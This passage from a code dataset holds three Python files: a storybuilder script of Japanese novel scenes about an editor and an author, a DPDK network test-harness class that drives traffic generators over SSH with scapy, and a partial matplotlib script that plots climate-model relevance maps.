sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append('storybuilder')\n## local libs\nfrom storybuilder.builder.world import World\nfrom storybuilder.builder.writer import Writer\n\n\n## define alias\nW = Writer\n_ = W.getWho()\n\n\n## scenes\ndef sc_noplot(w: World):\n sana, noto = W(w.sana), W(w.noto)\n cat = W(w.mascat)\n door = W(w.door)\n return w.scene(\"プロットはない\",\n sana.come(\"#数日後、再び先生宅を訪れる\"),\n sana.explain(\"それからも$Sは用事がある日を除き、毎日のように先生のアパートを訪れた\",\n \"スマートフォンを持っていないから連絡が取りづらい、という事情もあったが、\",\n \"それ以上にまだ全然信用も信頼も得られていない状態では今後も担当として仕事していくことは相当厳しいだろう\",\n \"まずは何でも良いので、作家と編集という関係を構築したい\"),\n sana.think(\"そんな思いで玄関のドアを開けて入る度に笑顔で「先生、原稿を」と口にするのだけれど、\"),\n noto.talk(\"ない\"),\n sana.think(\"返される低い声はいつも同じだ\"),\n sana.talk(\"先生\"),\n noto.talk(\"ない\"),\n sana.think(\"そのうちにやり取りも短くなり、どんどん洗練され、最終的にはドアを開けた瞬間に「ない」と言われるまでになった\",\n \"やっとここまで来たか、と自分のことながら呆れていたけれど、流石にこれ以上はもうどうなることもないだろうと楽観視して、この日、先生のアパートを訪れた\"),\n sana.talk(\"え……\"),\n door.look(\"それはドアの前だった\",\n \"原稿を千切ったものが裏側にしてテープで貼り付けられており、そこに『原稿はない!』と書かれていたのだ\"),\n sana.think(\"そういえばアパートを訪れた初日にも同じようなことがあったなと思い出してそれを剥ぎ取ると、\",\n \"一度インタフォンを押してから「入りますよー」と声を掛けて合鍵を使う\"),\n sana.talk(\"先生、あと何日か分かってるんですか?\"),\n noto.do(\"自然と合鍵を使って入ってくるようになった$CSの姿に一瞬先生はぎょっとした視線を向けたが、\",\n \"諦めたように読んでいた新聞を置くと、溜息混じりにこう言った\"),\n noto.talk(\"毎日来なくてもいいよ。分かってるから\"),\n sana.do(\"確かに壁に掛けられた大きな十月のカレンダーの最終日に赤丸が書かれている\",\n \"その右上の愛らしい『締切です』の文字はおそらく$fukayaのものだろう\"),\n sana.talk(\"先生はスマートフォンとか、せめてガラケーでもいいんですけど、持つ気はないんですか?\"),\n noto.talk(\"君は電話会社の営業か何かかね?\",\n \"持つ気のない人間に対して持てと言うのは、苦手なタコをいいから食えと目の前に突き出されるようなものだよ\"),\n sana.talk(\"先生タコが苦手なんですか?\"),\n sana.think(\"それは$fukayaの引き継ぎメモにはない情報だった\"),\n sana.talk(\"アレルギィがあるなら分かりますけど、別にコリコリした食感くらいで味も臭いもそんなに独特とは思いませんが\"),\n noto.talk(\"好きな人間は得てして気にならないものだよ\",\n \"ほら、よく犬や猫好きが言うだろう?\", \"全然臭くないですよ、寧ろ良い匂いです\", \"とか\",\n \"でもそうではない人間からすれば、あれは臭い\", \"ペットを屋内で飼っている人間は自分たちまでその臭いに染まっていることに気づいていないんだよ\"),\n sana.talk(\"でも先生、猫飼ってるじゃないですか\"),\n cat.be(),\n cat.do(\"太めの黒猫は満足したお腹で今、部屋の隅のストライプ柄のクッションの上で丸まっていた\"),\n noto.talk(\"あれは飼ってるんじゃない\", \"たまに遊びに来ているだけだ\"),\n sana.talk(\"はぁ\"),\n sana.think(\"まだ出会って一週間ほどなのに、既にその理屈っぽさと回りくどい言い回し、おまけにその頑固さという、引き継ぎメモでは全く触れられていない彼の人間性というものを、\",\n \"$Sは理解し始めていた\"),\n sana.talk(\"じゃあタコは差し入れしないように注意しますね\",\n \"それよりスマートフォンを購入しましょう、先生\",\n \"初めてならきっと割安で手に入りますよ\", \"先生なら電話だけでしょうから、一番安いプランで大丈夫ですし\"),\n noto.talk(\"スマートフォン?\",\n \"大体スマートの意味を君たちは理解しているのか?\",\n \"あの板状の機械のどこが賢いというのかね?\", \"元々は電話に機能が付いたものだったのに今や何だね、あれは、もう菓子付き玩具もびっくりの本末転倒なくらい電話の存在感がないじゃないか\",\n \"君は知らないだろうが半世紀前までまだ交換手が線を繋ぐのが普通だったんだ\",\n \"こう、ダイヤルを回してだね……\"),\n sana.talk(\"そういう電話が良いなら大正時代にでも転生してください\"),\n noto.talk(\"大正じゃない\", \"昭和だよ\"),\n sana.do(\"流石に言葉を使う職業をしているだけあって、簡単には折れてくれない\"),\n noto.talk(\"ところで君、お腹が空かないかね\"),\n sana.talk(\"ああ、$meはお昼はいつも適当にそこら辺で済ませたり、時間ない時は食べませんので\"),\n noto.talk(\"よし、なら、付いて来なさい\"),\n noto.do(\"そう言って立ち上がると、先生はハンガーからコートを手に取った\"),\n camera=w.sana,\n stage=w.on_hisapart,\n day=w.in_nogetpaper1, time=w.at_afternoon,\n )\n\ndef sc_changeofpace(w: World):\n sana, noto = W(w.sana), W(w.noto)\n return w.scene(\"気分転換\",\n sana.be(\"先生と歩いている\"),\n noto.talk(\"ほら、たまには気分転換も必要だろう?\"),\n sana.talk(\"原稿\"),\n noto.talk(\"まあまあ。今日はご飯をご馳走するから\"),\n noto.talk(\"あそこだ\"),\n stage=w.on_street,\n day=w.in_nogetpaper2, time=w.at_noon,\n ).omit()\n\ndef sc_lunchtime(w: World):\n sana, noto = W(w.sana), W(w.noto)\n chiyo = W(w.chiyoda)\n return w.scene(\"ランチタイム\",\n w.symbol(\"    ◆\"),\n noto.come(),\n sana.come(),\n noto.talk(\"こんにちは\"),\n chiyo.be(\"#カウンターで準備している\"),\n chiyo.talk(\"あら先生。今日はご機嫌みたいですね\"),\n sana.explain(\"先生に連れてこられたのはアパートから十分ほど歩いたところにある、喫茶店だった\",\n \"表の看板には『$on_mastercafe』とある\"),\n noto.talk(\"どちらかといえば良くはないが、今日は$a_chiyoさんの為にお客を連れてきたんだ\"),\n noto.do(\"先生はカウンターでコーヒーを落としていた黒エプロンの女性に声を掛けると、$CSを奥のテーブル席へと案内する\",\n \"店内はカウンターとテーブルで三十ほど席があったけれど、ランチタイムの割にはまだ半分以上空いていた\"),\n noto.talk(\"こっちに出てきてから何度も世話になっているんだ。うまいよ、ここのハンバーグは\"),\n noto.do(\"$CSが対面に座るなり、その顔を覗き込むようにして得意げに先生は言うと、注文を取りにやってきた黒エプロンの彼女からおしぼりを受け取って、それを広げ、顔を拭う\"),\n chiyo.talk(\"最近ご無沙汰でしたけど、お元気そうで何よりです\"),\n noto.talk(\"$meはいつもので、彼女にも同じものを頼むよ\"),\n chiyo.look(\"すらりとした体型で額がしっかり出るくらい髪を後ろでまとめ、涼やかで化粧気の薄い顔の為か、先生よりも若そうに見える\"),\n chiyo.talk(\"ハンバーグ定食ですね\", \"お飲み物はコーヒーで宜しいですか?\"),\n noto.talk(\"君もそれでいいだろう?\"),\n sana.do(\"$Sは「はい」と頷きながら、先生が自分の顔を拭ったおしぼりをコップの横に置く様をじっと観察していた\"),\n noto.talk(\"ん? どうしたの、$sana君?\"),\n sana.talk(\"いえ\", \"お昼なのにあまり混んでないなと\"),\n noto.do(\"そう言うと先生は顎を撫で付けながら「そうなんだよ」と微笑んだ\"),\n ## NOTE: 食事の様子を少し\n ## 潰れる店を「滅びゆく店」として描く\n ## またそれが=今の出版社の現状を暗示するように\n stage=w.on_mastercafe,\n )\n\ndef sc_lightnovel(w: World):\n sana, noto = W(w.sana), W(w.noto)\n return w.scene(\"ライトノベル\",\n w.br(),\n noto.be(\"#食べ終えて食後のコーヒーを\"),\n sana.be(\"#コーヒーを前にじっとしている\"),\n sana.explain(\"十分ほどして熱々にソースが弾けるハンバーグの載った皿を中央にした、定食セットが持ってこられた\",\n \"よくあるタイプのデミグラスソースで、脇に所謂ナポリタンのスパゲティが添えられている\"),\n noto.talk(\"これがね、小さい頃から好きでね\"),\n noto.do(\"先生はご飯よりも味噌汁よりも先にそのスパゲティから食べ始め、満足そうに頬を膨らませた\"),\n sana.do(\"$Sもそれに釣られるようにハンバーグの端を切り分け、口に入れたのだが、味は普通というか、期待通りのハンバーグだった\",\n \"そこには捻りも何もない、最近のトレンドのようにチーズが入っていたりもしないし、半熟卵も見つからない\",\n \"ごく有り触れたハンバーグなのだ\",\n \"それが嬉しくもあり懐かしくもあるのだが、何か驚きが足りない\"),\n noto.talk(\"旨いだろう?\"),\n sana.talk(\"はい、美味しいですよ\", \"ただ\"),\n noto.talk(\"その意見は食べ終えてから聞くことにするよ\",\n \"ただ、という言葉の後に褒め言葉が期待できるとは思えない\"),\n sana.talk(\"あ、すみません\", \"編プロ時代に月刊誌で食べ物系特集をやっていた頃から癖になってて\"),\n sana.do(\"更に言葉を続けようとして、先生の視線に気づき、$Sは口を噤んだ\",\n \"よくやってしまうのだ\",\n \"$geroたちもあんたと一緒に食べに行くと純粋に味わえないと苦笑している\"),\n sana.do(\"$Sは「旨い」と呟きながらハンバーグを食べる先生を前に、一言も喋らずに自分の分を食べ終えた\"),\n )\n\ndef sc_novelvalue(w: World):\n sana, noto = W(w.sana), W(w.noto)\n chiyo = W(w.chiyoda)\n return w.scene(\"小説の価値\",\n w.br(),\n noto.be(),\n sana.be(),\n noto.do(\"先生は食後のコーヒーを飲みながら「実はね」と前置きをして話し始めた\"),\n noto.talk(\"君をここに連れてきたのは少し考えてもらいたいことがあったからなんだ\"),\n sana.think(\"客が引いて店内には$Sたち以外に一人客が三人残るだけになっていた\",\n \"店員は店主らしき女性と、奥のキッチンから時々顔を見せる男性の二人だけらしい\",\n \"夫婦でやっているのかも知れない\"),\n sana.talk(\"小説についての話でしたら、いくらでも聞きますよ\"),\n noto.talk(\"また君はそうやってすぐに欲しいものだけに手を伸ばそうとするから駄目なんだよ\"),\n sana.talk(\"$meは編集者で、先生は作家です\",\n \"小説以外に話すことなんてありますか?\"),\n noto.do(\"そう言い放った$CSを一秒ほど見やった後で先生は小さく首を横に振る\"),\n noto.talk(\"君は蜘蛛の糸を掴まないタイプだね\"),\n sana.talk(\"なんですかそれは?\", \"褒めてる訳じゃありませんよね?\"),\n noto.talk(\"蜘蛛の糸と言えば芥川龍之介だよ\",\n \"死後、地獄に落とされたカンダタが生前に蜘蛛を助けたことがあったお陰で極楽に繋がる一本の蜘蛛の糸をお釈迦様に垂らしてもらえたんだ\",\n \"けれど強欲なカンダタは自分だけが助かろうとして一緒に登ろうとした他の亡者たちを蹴落とそうとした\",\n \"結局蜘蛛の糸は切れ、みんな地獄へと舞い戻ってしまったという、あの寓話だよ\"),\n sana.talk(\"それくらいは知っていますよ\",\n \"けど、何故$meはその糸を掴まないんですか?\", \"$meも極楽に行きたいですよ\"),\n noto.do(\"先生は紙ナプキンを一枚取り、そこにいくつか線を引く\",\n \"それぞれの線の先にはイチゴやケーキなど、食べ物の名前が書き込まれた\"),\n noto.talk(\"最近の若い人たちに限らないのだが、沢山ある中から自分が欲しいものの糸しか掴まないという人が多い\",\n \"バイキングで食べたいものだけを皿に盛るタイプだね\"),\n sana.think(\"確かにホテルのランチバイキングなどでは先生に言われたように、自分の食べたいものでいっぱいにする\",\n \"けれどそれと蜘蛛の糸の関係が全然見えてこない\"),\n sana.talk(\"好き嫌いをせずに食べろってことですか?\"),\n noto.talk(\"食べ物の好みの話じゃないんだよ\",\n \"うーん、そうだな。君は辞書を日常的に引くかね?\"),\n sana.talk(\"ええ、当然です\"),\n sana.do(\"と$Sは自分のスマートフォンを見せる\",\n \"電子辞書も持ち歩いてはいるが、大半は検索して済ませてしまうことが多い\"),\n noto.talk(\"それは辞書なのかね?\",\n \"そうじゃなくて、こう分厚い、あから順番に言葉を並べたものだよ\"),\n sana.talk(\"辞書くらい知ってますよ\",\n \"でも検索は別として、電子辞書で調べた方がずっと早いし、英語なんて発音まで聞けますよ?\"),\n noto.do(\"$CSがそう言うと先生は眉を寄せたまま表情を一秒ほど固めて、徐に瞼を閉じた\"),\n noto.talk(\"つまり紙の辞書は使わないということか\",\n \"辞書を引くとね、目的の言葉以外も目に付くんだよ\",\n \"例えば蜘蛛の糸を調べると、文学作品としての蜘蛛の糸以外にも言葉としての蜘蛛の糸や、蜘蛛という虫のこと、また空の雲だったり、熊だったり、苦しみだったりね、\",\n \"その周囲に色々な言葉が散らばっている\",\n \"そういったものに出会うことができる\",\n \"でも君が手にしているその道具は、そういった余分と思えることを教えてくれないだろう?\"),\n sana.do(\"ええ、と答えながらも、余分なことなら別に要らないんじゃないだろうか、としか思えない\"),\n noto.talk(\"君は何故$meがわざわざライトノベルという畑違いともいえる分野に手を出そうとしているか、きっと分からないだろうがね、\", \"&\"),\n noto.talk(\"ライトノベルは$meにとって蜘蛛の糸なんだ\"),\n sana.think(\"本当に欲しいものとは違う、ということだろうか\",\n \"$Sには先生の言いたいことがいまいち掴めず、眉を顰めるばかりだった\"),\n noto.talk(\"この店は特別なところは何もないし、客の入りも厳しい\",\n \"それでも店をやっているあの夫婦はこれで良いと言っている\",\n \"それもまた良いだろう\", \"彼らの人生だからね\"),\n chiyo.talk(\"ありがとうございました\", \"またどうぞ\"),\n sana.do(\"店の客には遂に$Sと先生の二人だけになったが、黒エプロンの彼女には特に沈んだ様子も見られない\"),\n noto.talk(\"あの夫婦も君と同じだ\", \"蜘蛛の糸を掴まない\",\n \"$meは蜘蛛の糸に手を伸ばそうとしている\",\n \"その違いが、分かるだろうか\"),\n sana.do(\"先生はそう言ってコーヒーの残りを飲み干すと、領収書を手にレジへと立った\"),\n ## NOTE\n ## 何故先生がラノベを書くことになったのか\n )\n\n## episode\ndef ep_spiderthread(w: World):\n return w.episode(\"3.蜘蛛のスレッド\",\n ## NOTE\n sc_noplot(w),\n sc_changeofpace(w),\n sc_lunchtime(w),\n sc_lightnovel(w),\n sc_novelvalue(w),\n )\n","sub_path":"src/spidersilk/e3_spiderthread.py","file_name":"e3_spiderthread.py","file_ext":"py","file_size_in_byte":18670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"487802086","text":"# BSD LICENSE\n#\n# Copyright(c) 2010-2014 Intel Corporation. All rights reserved.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Intel Corporation nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\nInterface for bulk traffic generators.\n\"\"\"\n\nimport re\nfrom time import sleep\nfrom settings import NICS\nfrom ssh_connection import SSHConnection\nfrom crb import Crb\nfrom etgen import IxiaPacketGenerator, SoftwarePacketGenerator\nfrom logger import getLogger\nfrom settings import IXIA\n\n\nclass Tester(Crb):\n\n \"\"\"\n Start the DPDK traffic generator on the machine `target`.\n A config file and pcap file must have previously been copied\n to this machine.\n \"\"\"\n PORT_INFO_CACHE_KEY = 'tester_port_info'\n CORE_LIST_CACHE_KEY = 'tester_core_list'\n NUMBER_CORES_CACHE_KEY = 'tester_number_cores'\n PCI_DEV_CACHE_KEY = 'tester_pci_dev_info'\n\n def __init__(self, crb, serializer):\n super(Tester, self).__init__(crb, serializer)\n self.NAME = 'tester'\n\n self.logger = getLogger(self.NAME)\n self.session = SSHConnection(self.get_ip_address(),\n self.NAME, self.get_password())\n self.session.init_log(self.logger)\n self.alt_session = SSHConnection(self.get_ip_address(),\n self.NAME + '_alt', self.get_password())\n self.alt_session.init_log(self.logger)\n\n self.bgProcIsRunning = False\n self.dut = None\n self.inBg = 0\n self.scapyCmds = []\n self.bgCmds = []\n self.bgItf = ''\n\n def init_ext_gen(self):\n \"\"\"\n Initialize tester packet generator object.\n \"\"\"\n if self.it_uses_external_generator():\n self.ixia_packet_gen = IxiaPacketGenerator(self)\n self.packet_gen = SoftwarePacketGenerator(self)\n\n def get_ip_address(self):\n \"\"\"\n Get ip address of tester CRB.\n \"\"\"\n return self.crb['tester IP']\n\n def get_password(self):\n \"\"\"\n Get tester login password of tester CRB.\n \"\"\"\n return self.crb['tester pass']\n\n def has_external_traffic_generator(self):\n \"\"\"\n Check whether performance test will base on IXIA equipment.\n \"\"\"\n try:\n if self.crb[IXIA] is not None:\n return True\n except Exception as e:\n return False\n\n return False\n\n def get_external_traffic_generator(self):\n \"\"\"\n Return IXIA object.\n \"\"\"\n return self.crb[IXIA]\n\n def it_uses_external_generator(self):\n \"\"\"\n Check whether IXIA generator is ready for performance test.\n \"\"\"\n return self.want_perf_tests and self.has_external_traffic_generator()\n\n def tester_prerequisites(self):\n \"\"\"\n Prerequest function should be called before execute any test case.\n Will call function to scan all lcore's information which on Tester.\n Then call pci scan function to collect nic device information.\n Then discovery the network topology and save it into cache file.\n At last setup DUT' environment for validation.\n \"\"\"\n self.init_core_list()\n self.pci_devices_information()\n self.restore_interfaces()\n self.scan_ports()\n\n def get_local_port(self, remotePort):\n \"\"\"\n Return tester local port connect to specified dut port.\n \"\"\"\n return self.dut.ports_map[remotePort]\n\n def get_local_port_type(self, remotePort):\n \"\"\"\n Return tester local port type connect to specified dut port.\n \"\"\"\n return self.ports_info[self.get_local_port(remotePort)]['type']\n\n def get_local_index(self, pci):\n \"\"\"\n Return tester local port index by pci id\n \"\"\"\n index = -1\n for port in self.ports_info:\n index += 1\n if pci == port['pci']:\n return index\n\n def get_pci(self, localPort):\n \"\"\"\n Return tester local port pci id.\n \"\"\"\n return self.ports_info[localPort]['pci']\n\n def get_interface(self, localPort):\n \"\"\"\n Return tester local port interface name.\n \"\"\"\n return self.ports_info[localPort]['intf']\n\n def get_mac(self, localPort):\n \"\"\"\n Return tester local port mac address.\n \"\"\"\n if self.ports_info[localPort]['type'] == 'ixia':\n return \"00:00:00:00:00:01\"\n else:\n return self.ports_info[localPort]['mac']\n\n def get_port_status(self, port):\n \"\"\"\n Return link status of ethernet.\n \"\"\"\n eth = self.ports_info[port]['intf']\n out = self.send_expect(\"ethtool %s\" % eth, \"# \")\n\n status = re.search(r\"Link detected:\\s+(yes|no)\", out)\n if not status:\n self.logger.error(\"ERROR: unexpected output\")\n\n if status.group(1) == 'yes':\n return 'up'\n else:\n return 'down'\n\n def restore_interfaces(self):\n \"\"\"\n Restore Linux interfaces.\n \"\"\"\n self.send_expect(\"modprobe igb\", \"# \", 20)\n self.send_expect(\"modprobe ixgbe\", \"# \", 20)\n self.send_expect(\"modprobe e1000e\", \"# \", 20)\n self.send_expect(\"modprobe e1000\", \"# \", 20)\n \n try:\n for (pci_bus, pci_id) in self.pci_devices_info:\n addr_array = pci_bus.split(':')\n\n self.check_Mellanox_pci(pci_bus,pci_id)\n itf = self.get_interface_name(addr_array[0], addr_array[1])\n self.send_expect(\"ifconfig %s up\" % itf, \"# \")\n\n except Exception as e:\n self.logger.error(\" !!! Restore ITF: \" + e.message)\n\n def scan_ports(self):\n \"\"\"\n Scan all ports on tester and save port's pci/mac/interface.\n \"\"\"\n if self.read_cache:\n self.ports_info = self.serializer.load(self.PORT_INFO_CACHE_KEY)\n\n if not self.read_cache or self.ports_info is None:\n self.scan_ports_uncached()\n if self.it_uses_external_generator():\n self.ports_info.extend(self.ixia_packet_gen.get_ports())\n self.serializer.save(self.PORT_INFO_CACHE_KEY, self.ports_info)\n\n self.logger.info(self.ports_info)\n\n def scan_ports_uncached(self):\n \"\"\"\n Return tester port pci/mac/interface information.\n \"\"\"\n self.ports_info = []\n\n for (pci_bus, pci_id) in self.pci_devices_info:\n # ignore unknown card types\n if pci_id not in NICS.values():\n self.logger.info(\"Tester: [000:%s %s] %s\" % (pci_bus, pci_id,\n \"unknow_nic\"))\n continue\n\n addr_array = pci_bus.split(':')\n bus_id = addr_array[0]\n devfun_id = addr_array[1]\n \n intf = self.get_interface_name(bus_id, devfun_id)\n \n if \"No such file\" in intf:\n self.logger.info(\"Tester: [000:%s %s] %s\" % (pci_bus, pci_id,\n \"unknow_interface\"))\n continue\n\n self.logger.info(\"Tester: [000:%s %s] %s\" % (pci_bus, pci_id, intf))\n macaddr = self.get_mac_addr(intf, bus_id, devfun_id)\n self.ports_info.append({'pci': pci_bus,\n 'type': pci_id,\n 'intf': intf,\n 'mac': macaddr})\n self.check_Mellanox_pci(pci_bus,pci_id)\n if self.isMellanox :\n intf1 = self.get_interface_name(bus_id, devfun_id)\n macaddr1 = self.get_mac_addr(intf1, bus_id, devfun_id)\n self.ports_info.append({'pci': pci_bus,\n 'type': pci_id,\n 'intf': intf1,\n 'mac': macaddr1})\n \n def send_ping6(self, localPort, ipv6, mac):\n \"\"\"\n Send ping6 packet from local port with destination ipv6 address.\n \"\"\"\n if self.ports_info[localPort]['type'] == 'ixia':\n return self.ixia_packet_gen.send_ping6(self.ports_info[localPort]['pci'], mac, ipv6)\n else:\n return self.send_expect(\"ping6 -w 5 -c 5 -A -I %s %s\" % (self.ports_info[localPort]['intf'], ipv6), \"# \", 10)\n\n def get_port_numa(self, port):\n \"\"\"\n Return tester local port numa.\n \"\"\"\n pci = self.ports_info[port]['pci']\n out = self.send_expect(\"cat /sys/bus/pci/devices/0000:%s/numa_node\" % pci, \"#\")\n return int(out)\n\n def check_port_list(self, portList, ftype='normal'):\n \"\"\"\n Check specified port is IXIA port or normal port.\n \"\"\"\n dtype = None\n plist = set()\n for txPort, rxPort, _ in portList:\n plist.add(txPort)\n plist.add(rxPort)\n\n plist = list(plist)\n if len(plist) > 0:\n dtype = self.ports_info[plist[0]]['type']\n\n for port in plist[1:]:\n if dtype != self.ports_info[port]['type']:\n return False\n\n if ftype == 'ixia' and dtype != ftype:\n return False\n\n return True\n\n def scapy_append(self, cmd):\n \"\"\"\n Append command into scapy command list.\n \"\"\"\n self.scapyCmds.append(cmd)\n\n def scapy_execute(self, timeout=60):\n \"\"\"\n Execute scapy command list.\n \"\"\"\n self.kill_all()\n\n self.send_expect(\"scapy\", \">>> \")\n if self.bgProcIsRunning:\n self.send_expect('subprocess.call(\"scapy -c sniff.py &\", shell=True)', \">>> \")\n self.bgProcIsRunning = False\n sleep(2)\n\n for cmd in self.scapyCmds:\n self.send_expect(cmd, \">>> \", timeout)\n\n sleep(2)\n self.scapyCmds = []\n self.send_expect(\"exit()\", \"# \")\n\n def scapy_background(self):\n \"\"\"\n Configure scapy running in backgroud mode which mainly purpose is\n that save RESULT into scapyResult.txt.\n \"\"\"\n self.inBg = True\n\n def scapy_foreground(self):\n \"\"\"\n Running backgroup scapy and convert to foregroup mode.\n \"\"\"\n self.send_expect(\"echo -n '' > scapyResult.txt\", \"# \")\n if self.inBg:\n self.scapyCmds.append('f = open(\\'scapyResult.txt\\',\\'w\\')')\n self.scapyCmds.append('f.write(RESULT)')\n self.scapyCmds.append('f.close()')\n self.scapyCmds.append('exit()')\n\n outContents = \"import os\\n\" + \\\n 'conf.color_theme=NoTheme()\\n' + 'RESULT=\"\"\\n' + \\\n \"\\n\".join(self.scapyCmds) + \"\\n\"\n self.create_file(outContents, 'sniff.py')\n\n self.logger.info('SCAPY Receive setup:\\n' + outContents)\n\n self.bgProcIsRunning = True\n self.scapyCmds = []\n self.inBg = False\n\n def scapy_get_result(self):\n \"\"\"\n Return RESULT which saved in scapyResult.txt.\n \"\"\"\n out = self.send_expect(\"cat scapyResult.txt\", \"# \")\n self.logger.info('SCAPY Result:\\n' + out + '\\n\\n\\n')\n\n return out.rpartition('[')[0]\n\n def traffic_generator_throughput(self, portList, rate_percent=100, delay=5):\n \"\"\"\n Run throughput performance test on specified ports.\n \"\"\"\n if self.check_port_list(portList, 'ixia'):\n return self.ixia_packet_gen.throughput(portList, rate_percent, delay)\n if not self.check_port_list(portList):\n self.logger.warning(\"exception by mixed port types\")\n return None\n return self.packet_gen.throughput(portList, rate_percent)\n\n def traffic_generator_loss(self, portList, ratePercent):\n \"\"\"\n Run loss performance test on specified ports.\n \"\"\"\n if self.check_port_list(portList, 'ixia'):\n return self.ixia_packet_gen.loss(portList, ratePercent)\n elif not self.check_port_list(portList):\n self.logger.warning(\"exception by mixed port types\")\n return None\n return self.packet_gen.loss(portList, ratePercent)\n\n def traffic_generator_latency(self, portList, ratePercent=100, delay=5):\n \"\"\"\n Run latency performance test on specified ports.\n \"\"\"\n if self.check_port_list(portList, 'ixia'):\n return self.ixia_packet_gen.latency(portList, ratePercent, delay)\n else:\n return None\n\n def extend_external_packet_generator(self, clazz, instance):\n \"\"\"\n Update packet generator function, will implement later.\n \"\"\"\n if self.it_uses_external_generator():\n self.ixia_packet_gen.__class__ = clazz\n current_attrs = instance.__dict__\n instance.__dict__ = self.ixia_packet_gen.__dict__\n instance.__dict__.update(current_attrs)\n\n def kill_all(self, killall=False):\n \"\"\"\n Kill all scapy process or DPDK application on tester.\n \"\"\"\n if not self.has_external_traffic_generator():\n self.alt_session.send_expect('killall scapy 2>/dev/null; echo tester', '# ', 5)\n if killall:\n super(Tester, self).kill_all()\n\n def close(self):\n \"\"\"\n Close ssh session and IXIA tcl session.\n \"\"\"\n super(Tester, self).close()\n if self.it_uses_external_generator():\n self.ixia_packet_gen.close()\n","sub_path":"raslan/framework/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":14833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"146126691","text":"\"\"\"\nScript to plot figure 5b\n\nAuthor : Zachary M. Labe\nDate : 7 July 2021\nVersion : 1 \n\"\"\"\n\n### Import packages\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nfrom netCDF4 import Dataset\nfrom mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid\nimport palettable.cubehelix as cm\nimport palettable.cartocolors.qualitative as cc\nimport palettable.scientific.diverging as dddd\nfrom sklearn.metrics import accuracy_score\nimport scipy.stats as sts\nimport cmocean\n\n### Plotting defaults \nplt.rc('text',usetex=True)\nplt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']}) \n\n### Parameters\ndirectorydata = '/Users/zlabe/Documents/Research/ModelComparison/Data/MSFigures_v1/'\ndirectoryfigure = '/Users/zlabe/Desktop/ModelComparison_v1/MSFigures/'\nvariablesall = 'T2M'\nscaleLRPmax = True\nallDataLabels = ['CanESM2','MPI','CSIRO-MK3.6','EC-EARTH','GFDL-CM3','GFDL-ESM2M','LENS','MM-Mean']\nletters = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\"]\n\n###############################################################################\n###############################################################################\n############################################################################### \n### Read in data\nlat1 = np.load(directorydata + 'Lat_LowerArctic.npy',allow_pickle=True)\nlon1 = np.load(directorydata + 'Lon_LowerArctic.npy',allow_pickle=True)\nlrp = np.load(directorydata + 'LRPcomposites_LowerArctic_8classes.npy',allow_pickle=True)\nlrpAA = np.load(directorydata + 'LRPcomposites_LowerArcticAA_8classes.npy',allow_pickle=True)\n\n### Prepare data for plotting\nalldata = np.append(lrp,lrpAA,axis=0)\n\n###############################################################################\n###############################################################################\n###############################################################################\n### Plot subplot of LRP means training\nlimit = np.arange(0,0.60001,0.005)\nbarlim = np.round(np.arange(0,0.601,0.6),2)\ncmap = cm.cubehelix2_16.mpl_colormap\nlabel = r'\\textbf{RELEVANCE}'\n\nfig = plt.figure(figsize=(10,3))\nfor r in range(alldata.shape[0]):\n var = alldata[r]\n \n if scaleLRPmax == True:\n var = var/np.nanmax(var)\n else:\n var = var\n \n ax1 = plt.subplot(2,alldata.shape[0]//2,r+1)\n m = Basemap(projection='npstere',boundinglat=61.3,lon_0=0,\n resolution='l',round =True,area_thresh=10000)\n m.drawcoastlines(color='darkgrey',linewidth=0.3)\n \n var, lons_cyclic = addcyclic(var, lon1)\n var, lons_cyclic = shiftgrid(180., var, lons_cyclic, start=False)\n lon2d, lat2d = np.meshgrid(lons_cyclic, lat1)\n x, y = m(lon2d, lat2d)\n \n circle = m.drawmapboundary(fill_color='dimgrey',color='dimgray',\n linewidth=0.7)\n circle.set_clip_on(False)\n \n cs1 = m.contourf(x,y,var,limit,extend='max')\n cs1.set_cmap(cmap) \n \n if r < 8:\n ax1.annotate(r'\\textbf{%s}' % allDataLabels[r],xy=(0,0),xytext=(0.5,1.13),\n textcoords='axes fraction',color='dimgrey',fontsize=8,\n rotation=0,ha='center',va='center')\n ax1.annotate(r'\\textbf{[%s]}' % letters[r],xy=(0,0),xytext=(0.86,0.97),\n textcoords='axes fraction',color='k',fontsize=6,\n rotation=330,ha='center',va='center')\n \nax1.annotate(r'\\textbf{1950-2004}',xy=(0,0),xytext=(-7.3,1.70),\n textcoords='axes fraction',color='k',fontsize=10,\n 